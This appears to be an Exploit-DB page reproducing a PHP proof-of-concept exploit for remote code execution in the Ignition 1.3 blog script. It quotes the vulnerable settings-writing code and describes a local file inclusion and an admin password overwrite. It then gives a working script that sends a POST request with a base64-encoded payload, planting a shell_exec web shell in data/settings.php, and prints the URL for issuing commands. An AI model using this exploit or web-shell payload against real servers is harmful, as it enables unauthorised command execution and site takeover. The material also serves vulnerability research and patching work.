Ignition 1.3 – Remote Code Execution

• Exploit Database
• 18 阅读

• 作者： cOndemned
  日期： 2010-12-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15865/

• <?php
  
  /*
  
  Ignition 1.3 Remote Code Execution Exploit
  by cOndemned
  download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
  
  
  source of i-options.php
  
  	1.	<?php
  	2.	session_start();
  	3.	if ($_POST['submit']) {
  	4.	if ($FH = @fopen('data/settings.php', 'w')) {
  	5.		@fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
  	6.	$uri = "'.$_POST['uri'].'";
  	7.	$suri = "'.$_POST['suri'].'";
  	8.	$blogtitle = "'.$_POST['title'].'";
  	9.	$description = "'.$_POST['description'].'";
  	10.	$postid = "'.$_POST['id'].'";
  	11.	$author = "'.$_POST['author'].'";
  	12.	$skin = "'.$_POST['skin'].'";
  	13.	$gravatar = "'.$_POST['gravatar'].'";
  	14.	$twitter = "' . $_POST['twitter'] . '";
  	15.	$identica = "' . $_POST['identica'] . '";
  	16.	$book = "' . $_POST['book'] . '";
  	17.	$game = "' . $_POST['game'] . '";
  	18.	$language = "' . $_POST['lang'] . '";
  	19.	
  	20.	require_once("template.php");
  	21.	require_once("lang/$language.php");');
  	22.		#fclose($FH);
  	23.	}
  
  We can overwrite setting.php by simply sending specially crafted POST request, 
  and put some evil code into one of the variables. After running my PoC line with
  $language var will be:
  
  	$language = "en";echo @shell_exec($_GET['cmd']);$wtf="";
  
  Where "en" is default language and without filling this field correctly admin 
  will see error while trying to access blog index. 
  
  other attacks scenarios:
  
  	- attacker can use $_POST['language'] variable to exploit Local File 
  	Inclusion (lines 18 and 21)
  
  	- fill $_POST['pass'] with new password (md5 hashed) to overwrite admins
  	password
  
  	- etc...
  */
  
  
  $target = 'http://localhost/ignition/';
  
  $post = array
  (
  	'uri'		=> $target,
  	'suri'		=> $target,
  	'description'	=> 'Just another lame php blog script owned :<',
  	'skin'		=> 'default',
  	'lang'		=> base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),
  	'submit'	=> 1
  );
  
  $sock = curl_init();
  
  curl_setopt_array
  (
  	$sock, 
  	array
  	(
  		CURLOPT_URL 		=> "$target/i-options.php",
  		CURLOPT_RETURNTRANSFER	=> true,
  		CURLOPT_POST		=> true,
  		CURLOPT_POSTFIELDS	=> http_build_query($post)
  	)
  );
  
  curl_exec($sock);
  curl_close($sock);
  
  echo "Check: $target/data/settings.php?cmd=[system_command]";
  
  ?>